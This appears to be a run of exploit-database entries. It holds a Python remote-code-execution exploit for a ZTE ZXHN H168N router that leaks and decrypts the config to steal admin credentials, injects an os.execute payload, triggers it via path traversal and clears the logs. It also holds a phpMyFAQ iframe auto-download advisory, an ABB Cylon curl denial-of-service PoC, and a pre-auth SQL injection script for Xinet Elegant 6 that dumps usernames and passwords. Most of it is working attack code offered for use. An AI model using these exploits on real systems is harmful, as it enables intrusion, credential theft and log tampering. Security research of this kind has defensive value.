headers = {
"Content-Type": "application/x-www-form-urlencoded"
}
data = {
"IF_LogOff": "1",
"IF_LanguageSwitch": "",
"IF_ModeSwitch": ""
}
requests.post(f"http://{host}:{port}/", headers=headers, data=data)
def leak_config(host, port):
conn = http.client.HTTPConnection(host, port)
boundary = "---------------------------25853724551472601545982946443"
body = (
f"{boundary}\r\n"
'Content-Disposition: form-data; name="config"\r\n'
"\r\n"
"\r\n"
f"{boundary}--\r\n"
)
headers = {
"Content-Type": f"multipart/form-data; boundary={boundary}",
"Content-Length": str(len(body)),
"Connection": "keep-alive",
}
conn.request("POST", "/getpage.lua?pid=101&nextpage=ManagDiag_UsrCfgMgr_t.lp", body, headers)
response = conn.getresponse()
response_data = response.read()
with open("config.bin", "wb") as file:
file.write(response_data)
conn.close()
def _read_exactly(fd, size, desc="data"):
chunk = fd.read(size)
if len(chunk) != size:
return None
return chunk
def _read_struct(fd, fmt, desc="struct"):
size = struct.calcsize(fmt)
data = _read_exactly(fd, size, desc)
if data is None:
return None
return struct.unpack(fmt, data)
def read_aes_data(fd_in, key):
encrypted_data = b""
while True:
aes_hdr = _read_struct(fd_in, ">3I", desc="AES chunk header")
if aes_hdr is None:
return None
_, chunk_len, marker = aes_hdr
chunk = _read_exactly(fd_in, chunk_len, desc="AES chunk data")
if chunk is None:
return None
encrypted_data += chunk
if marker == 0:
break
cipher = AES.new(key.ljust(16, b"\0")[:16], AES.MODE_ECB)
fd_out = BytesIO()
fd_out.write(cipher.decrypt(encrypted_data))
fd_out.seek(0)
return fd_out
def read_compressed_data(fd_in, enc_header):
hdr_crc = zlib.crc32(struct.pack(">6I", *enc_header[:6]))
if enc_header[6] != hdr_crc:
return None
total_crc = 0
fd_out = BytesIO()
while True:
comp_hdr = _read_struct(fd_in, ">3I", desc="compression chunk header")
if comp_hdr is None:
return None
uncompr_len, compr_len, marker = comp_hdr
chunk = _read_exactly(fd_in, compr_len, desc="compression chunk data")
if chunk is None:
return None
total_crc = zlib.crc32(chunk, total_crc)
uncompressed = zlib.decompress(chunk)
if len(uncompressed) != uncompr_len:
return None
fd_out.write(uncompressed)
if marker == 0:
break
if enc_header[5] != total_crc:
return None
fd_out.seek(0)
return fd_out
def read_config(fd_in, fd_out, key):
ver_header_1 = _read_struct(fd_in, ">5I", desc="1st version header")
if ver_header_1 is None:
return
ver_header_2_offset = 0x14 + ver_header_1[4]
fd_in.seek(ver_header_2_offset)
ver_header_2 = _read_struct(fd_in, ">11I", desc="2nd version header")
if ver_header_2 is None:
return
ver_header_3_offset = ver_header_2[10]
fd_in.seek(ver_header_3_offset)
ver_header_3 = _read_struct(fd_in, ">2H5I", desc="3rd version header")
if ver_header_3 is None:
return
signed_cfg_size = ver_header_3[3]
file_size = stat(fd_in.name).st_size
fd_in.seek(0x80)
sign_header = _read_struct(fd_in, ">3I", desc="signature header")
if sign_header is None:
return
if sign_header[0] != 0x04030201:
return
sign_length = sign_header[2]
signature = _read_exactly(fd_in, sign_length, desc="signature")
if signature is None:
return
enc_header_raw = _read_exactly(fd_in, 0x3C, desc="encryption header")
if enc_header_raw is None:
return
encryption_header = struct.unpack(">15I", enc_header_raw)
if encryption_header[0] != 0x01020304:
return
enc_type = encryption_header[1]
if enc_type in (1, 2):
if not key:
return
fd_in = read_aes_data(fd_in, key)
if fd_in is None:
return
if enc_type == 2:
enc_header_raw = _read_exactly(fd_in, 0x3C, desc="second encryption header")
if enc_header_raw is None:
return
encryption_header = struct.unpack(">15I", enc_header_raw)
if encryption_header[0] != 0x01020304:
return
enc_type = 0
if enc_type == 0:
fd_in = read_compressed_data(fd_in, encryption_header)
if fd_in is None:
return
fd_out.write(fd_in.read())
def decrypt_config(config_key):
encrypted = open("config.bin", "rb")
decrypted = open("decrypted.xml", "wb")
read_config(encrypted, decrypted, config_key)
with open("decrypted.xml", "r") as file:
contents = file.read()
username = contents.split("IGD.AU2")[1].split("User")[1].split("val=\"")[1].split("\"")[0]
password = contents.split("IGD.AU2")[1].split("Pass")[1].split("val=\"")[1].split("\"")[0]
encrypted.close()
os.system("rm config.bin")
decrypted.close()
os.system("rm decrypted.xml")
return username, password
def change_log_level(host, port, log_level):
level_map = {
"critical": "2",
"notice": "5"
}
headers = {
"Content-Type": "application/x-www-form-urlencoded"
}
data = {
"IF_ACTION": "Apply",
"_BASICCONIG": "Y",
"LogEnable": "1",
"LogLevel": level_map[log_level],
"ServiceEnable": "0",
"Btn_cancel_LogManagerConf": "",
"Btn_apply_LogManagerConf": "",
"downloadlog": "",
"Btn_clear_LogManagerConf": "",
"Btn_save_LogManagerConf": "",
"Btn_refresh_LogManagerConf": ""
}
requests.get(f"http://{host}:{port}/getpage.lua?pid=123&nextpage=ManagDiag_LogManag_t.lp&Menu3Location=0")
requests.get(f"http://{host}:{port}/common_page/ManagDiag_LogManag_lua.lua")
requests.post(f"http://{host}:{port}/common_page/ManagDiag_LogManag_lua.lua", headers=headers, data=data)
def change_username(host, port, new_username, old_password):
headers = {
"Content-Type": "application/x-www-form-urlencoded"
}
data = {
"IF_ACTION": "Apply",
"_InstID": "IGD.AU2",
"Right": "2",
"Username": new_username,
"Password": old_password,
"NewPassword": old_password,
"NewConfirmPassword": old_password,
"Btn_cancel_AccountManag": "",
"Btn_apply_AccountManag": ""
}
requests.get(f"http://{host}:{port}/getpage.lua?pid=123&nextpage=ManagDiag_AccountManag_t.lp&Menu3Location=0")
requests.get(f"http://{host}:{port}/common_page/accountManag_lua.lua")
requests.post(f"http://{host}:{port}/common_page/accountManag_lua.lua", headers=headers, data=data)
def clear_log(host, port):
headers = {
"Content-Type": "application/x-www-form-urlencoded"
}
data = {
"IF_ACTION": "clearlog"
}
requests.get(f"http://{host}:{port}/getpage.lua?pid=123&nextpage=ManagDiag_LogManag_t.lp&Menu3Location=0")
requests.get(f"http://{host}:{port}/common_page/ManagDiag_LogManag_lua.lua")
requests.post(f"http://{host}:{port}/common_page/ManagDiag_LogManag_lua.lua", headers=headers, data=data)
def refresh_log(host, port):
headers = {
"Content-Type": "application/x-www-form-urlencoded"
}
data = {
"IF_ACTION": "Refresh"
}
requests.get(f"http://{host}:{port}/getpage.lua?pid=123&nextpage=ManagDiag_LogManag_t.lp&Menu3Location=0")
requests.get(f"http://{host}:{port}/common_page/ManagDiag_LogManag_lua.lua")
requests.post(f"http://{host}:{port}/common_page/ManagDiag_LogManag_lua.lua", headers=headers, data=data)
def trigger_rce(host, port):
requests.get(f"http://{host}:{port}/getpage.lua?pid=123&nextpage=ManagDiag_StatusManag_t.lp&Menu3Location=0")
requests.get(f"http://{host}:{port}/getpage.lua?pid=123&nextpage=..%2f..%2f..%2f..%2f..%2f..%2f..%2fvar%2fuserlog.txt&Menu3Location=0")
def rce(cmd):
return f"<? _G.os.execute('rm /var/userlog.txt;{cmd}') ?>"
def pwn(config_key, host, port):
leak_config(host, port)
username, password = decrypt_config(config_key)
login(host, port, username, password)
shellcode = "echo \"pwned\""
payload = rce(shellcode)
change_username(host, port, payload, password)
refresh_log(host, port)
change_log_level(host, port, "notice")
refresh_log(host, port)
trigger_rce(host, port)
clear_log(host, port)
change_username(host, port, username, password)
change_log_level(host, port, "critical")
logout(host, port)
print("[+] PoC complete")
def main():
parser = argparse.ArgumentParser(description="Run remote command on ZTE ZXHN H168N V3.1")
parser.add_argument("--config_key", type=lambda x: x.encode(), default=b"GrWM3Hz<vz&f^9", help="Leaked config encryption key from cspd")
parser.add_argument("--host", required=True, help="Target IP address of the router")
parser.add_argument("--port", required=True, type=int, help="Target port of the router")
args = parser.parse_args()
pwn(args.config_key, args.host, args.port)
if __name__ == "__main__":
main()
# Exploit Title: phpMyFAQ v3.2.10 - Unintended File Download Triggered by Embedded Frames
# Date: 13 Dec 2024
# Exploit Author: George Chen
# Vendor Homepage: https://github.com/thorsten/phpMyFAQ/
# Software Link: https://github.com/thorsten/phpMyFAQ/
# Version: v3.2.10
# Tested on: Mac, Win
# CVE : CVE-2024–55889
*Summary*
A vulnerability exists in the FAQ Record component of
https://github.com/thorsten/phpMyFAQ v3.2.10 where a privileged attacker
can trigger a file download on a victim’s machine upon page visit by
embedding it in an <iframe> element without user interaction or explicit
consent.
*Details*
In http://localhost/admin/index.php?action=editentry&id=20&lang=en, where a
FAQ record is either created or edited, an attacker can insert an iframe,
as “source code”, pointing to a prior “malicious” attachment that the
attacker has uploaded via FAQ “new attachment” upload, such that any page
visits to this FAQ will trigger an automated download (from the edit
screen, download is automated; from the faq page view as a normal user,
depending on the browser, a pop up confirmation may be presented before the
actual download. Firebox browser, for instance, does not require any
interactions).
[image: image.png]
*PoC*
1. create a new FAQ record and upload a “malicious” file — in my case, I
uploaded an eicar file. Take note of the uri, ie
“index.php?action=attachment&id=2”
2. in the FAQ record, insert a “source code” blob using the “< >” button
3. insert in the following snippet and save FAQ record:
<p><iframe src="index.php?action=attachment&id=2"></iframe></p> [image:
image.png]
4. Once the edit page reloads, the malicious code will be downloaded
onto the local machine without user interaction:[image: image.png]
Advisory:
https://github.com/thorsten/phpMyFAQ/security/advisories/GHSA-m3r7-8gw7-qwvc
Disclosure: https://geochen.medium.com/cve-2024-55889-03572ae6c35c
# Exploit title: ABB Cylon Aspect 3.08.03 (webServerDeviceLabelUpdate.php) File Write DoS
# Vendor: ABB Ltd.
# Product web page: https://www.global.abb
# Affected version: NEXUS Series, MATRIX-2 Series, ASPECT-Enterprise, ASPECT-Studio
Firmware: <=3.08.03
Summary: ASPECT is an award-winning scalable building energy management
and control solution designed to allow users seamless access to their
building data through standard building protocols including smart devices.
Desc: The ABB Cylon Aspect BMS/BAS controller suffers from an authenticated
arbitrary content injection vulnerability in the webServerDeviceLabelUpdate.php
script due to a lack of input validation. Authenticated attackers can exploit
the 'deviceLabel' POST parameter to write arbitrary content to a fixed file
location at /usr/local/aam/etc/deviceLabel, potentially causing a denial of
service.
Tested on: GNU/Linux 3.15.10 (armv7l)
GNU/Linux 3.10.0 (x86_64)
GNU/Linux 2.6.32 (x86_64)
Intel(R) Atom(TM) Processor E3930 @ 1.30GHz
Intel(R) Xeon(R) Silver 4208 CPU @ 2.10GHz
PHP/7.3.11
PHP/5.6.30
PHP/5.4.16
PHP/4.4.8
PHP/5.3.3
AspectFT Automation Application Server
lighttpd/1.4.32
lighttpd/1.4.18
Apache/2.2.15 (CentOS)
OpenJDK Runtime Environment (rhel-2.6.22.1.-x86_64)
OpenJDK 64-Bit Server VM (build 24.261-b02, mixed mode)
ErgoTech MIX Deployment Server 2.0.0
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience
Advisory ID: ZSL-2025-5892
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2025-5892.php
21.04.2024
--
$ cat project
P R O J E C T
.|
| |
|'| ._____
___ | | |. |' .---"|
_ .-' '-. | | .--'| || | _| |
.-'| _.| | || '-__ | | | || |
|' | |. | || | | | | || |
____| '-' ' "" '-' '-.' '` |____
░▒▓███████▓▒░░▒▓███████▓▒░ ░▒▓██████▓▒░░▒▓█▓▒░▒▓███████▓▒░
░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
░▒▓███████▓▒░░▒▓███████▓▒░░▒▓████████▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
░▒▓███████▓▒░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
░▒▓████████▓▒░▒▓██████▓▒░ ░▒▓██████▓▒░
░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░░░░░░
░▒▓██████▓▒░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒▒▓███▓▒░
░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
░▒▓█▓▒░░░░░░░░▒▓██████▓▒░ ░▒▓██████▓▒░
$ curl http://192.168.73.31/webServerDeviceLabelUpdate.php \
> -H "Cookie: PHPSESSID=xxx" \
> -d "deviceLabel=`printf '%.0sA' {1..10000}`"\
> # --data-urlencode "deviceLabel@largecontent.txt"
$ curl http://192.168.73.31/webServerConfiguration.php | grep AAA
# Exploit Title: Xinet Elegant 6 Asset Lib Web UI 6.1.655 - SQL Injection
# Exploit author: hyp3rlinx
import requests,time,re,sys,argparse
#NAPC Xinet Elegant 6 Asset Library v6.1.655
#Pre-Auth SQL Injection 0day Exploit
#By hyp3rlinx
#ApparitionSec
#UPDATED: Jan 2024 for python3
#TODO: add SSL support
#===============================
#This will dump tables, usernames and passwords in vulnerable versions
#REQUIRE PARAMS: LoginForm[password]=&LoginForm[rememberMe]=0&LoginForm[username]=SQL&yt0
#SQL INJECTION VULN PARAM --> LoginForm[username]
#================================================
IP=""
PORT="80"
URL=""
NUM_INJECTS=20
k=1
j=0
TABLES=False
CREDS=False
SHOW_SQL_ERROR=False
def vuln_ver_chk():
global IP, PORT
TARGET = "http://"+IP+":"+PORT+"/elegant6/login"
response = requests.get(TARGET)
if re.findall(r'\bElegant",appVersion:"6.1.655\b', response.content.decode()):
print("[+] Found vulnerable NAPC Elegant 6 Asset Library version 6.1.655.")
return True
print("[!] Version not vulnerable :(")
return False
def sql_inject_request(SQL):
global IP, PORT
URL = "http://"+IP+":"+PORT+"/elegant6/login"
tmp=""
headers = {'User-Agent': 'Mozilla/5.0'}
payload = {'LoginForm[password]':'1','LoginForm[rememberMe]':'0','LoginForm[username]':SQL}
session = requests.Session()
res = session.post(URL,headers=headers,data=payload)
idx = res.content.decode('utf-8').find('CDbCommand') # Start of SQL Injection Error in response
idx2 = res.content.decode('utf-8').find('key 1') # End of SQL Injection Error in response
return res.content[idx : idx2+3]
#Increments SQL LIMIT clause 0,1, 1,2, 1,3 etc
def inc():
global k,j
while j < NUM_INJECTS:
j+=1
if k !=1:
k+=1
return str(j)+','+str(k)
def tidy_up(results):
global CREDS
idx = results.find("'".encode())
if idx != -1:
idx2 = results.rfind("'".encode())
if not CREDS:
return results[idx + 1: idx2 -2]
else:
return results[idx + 2: idx2]
def breach(i):
global k,j,NUM_INJECTS,SHOW_SQL_ERROR
result=""
#Dump Usernames & Passwords
if CREDS:
if i % 2 == 0:
target='username'
else:
target='password'
SQL=('"and (select 1 from(select count(*),concat((select(select concat(0x2b,'+target+'))'
'from user limit '+str(i)+', 1),floor(rand(0)*2))x from user group by x)a)-- -')
if not SHOW_SQL_ERROR:
result = tidy_up(sql_inject_request(SQL))
if result:
result = result.decode()
else:
result = sql_inject_request(SQL)+"\n"
if result:
result = result.decode()
print("[+] Dumping "+str(target)+": "+str(result))
#Dump Tables
if TABLES:
while j < NUM_INJECTS:
nums = inc()
SQL=('"and (select 1 from (Select count(*),Concat((select table_name from information_schema.tables where table_schema=database()'
'limit '+nums+'),0x3a,floor(rand(0)*2))y from information_schema.tables group by y) x)-- -')
if not SHOW_SQL_ERROR:
result = tidy_up(sql_inject_request(SQL))
else:
result = sql_inject_request(SQL) + "\n"
if result:
print("[+] Dumping Table... " +str(result.decode()))
time.sleep(0.3)
def parse_args():
parser = argparse.ArgumentParser()
parser.add_argument("-i", "--ip_address", help="<TARGET-IP>.")
parser.add_argument("-p", "--port", help="Port, Default is 80")
parser.add_argument("-t", "--get_tables", nargs="?", const="1", help="Dump Database Tables.")
parser.add_argument("-c", "--creds", nargs="?", const="1", help="Dump Database Credentials.")
parser.add_argument("-m", "--max_injects", nargs="?", const="1", help="Max SQL Injection Attempts, Default is 20.")
parser.add_argument("-s", "--show_sql_errors", nargs="?", const="1", help="Display SQL Errors, Default is Clean Dumps.")
parser.add_argument("-e", "--examples", nargs="?", const="1", help="Show script usage.")
return parser.parse_args()
def usage():
print("Dump first ten rows of usernames and passwords")
print("NAPC-Elegant-6-SQL-Exploit.py -i <TARGET-IP> -c -m 10\n")
print("\nDump first five rows of database tables and show SQL errors")
print("NAPC-Elegant-6-SQL-Exploit.py -i <TARGET-IP> -t -m 5 -s\n")
print("NAPC-Elegant-6-SQL-Exploit.py -i <TARGET-IP> -p80 -t -c -m30\n")
exit(0)
def main(args):
global TABLES,CREDS,URL,IP,NUM_INJECTS,SHOW_SQL_ERROR
if args.ip_address:
IP=args.ip_address
if args.port:
PORT=args.port
if args.get_tables:
TABLES=True
if args.creds:
CREDS=True
if args.max_injects:
NUM_INJECTS = int(args.max_injects)
if args.show_sql_errors:
SHOW_SQL_ERROR=True
if args.examples:
usage()
if vuln_ver_chk():
for i in range(0, NUM_INJECTS):
breach(i)
time.sleep(0.3)
if __name__=='__main__':
parser = argparse.ArgumentParser()
print("NAPC Elegant 6 Asset Library v6.1.655")
print("Pre-Authorization SQL Injection 0day Exploit")
print("Discovery / eXploit By hyp3rlinx")
print("ApparitionSec\n")
time.sleep(0.5)
if len(sys.argv)== 1:
parser.print_help(sys.stderr)
sys.exit(0)
main(parse_args())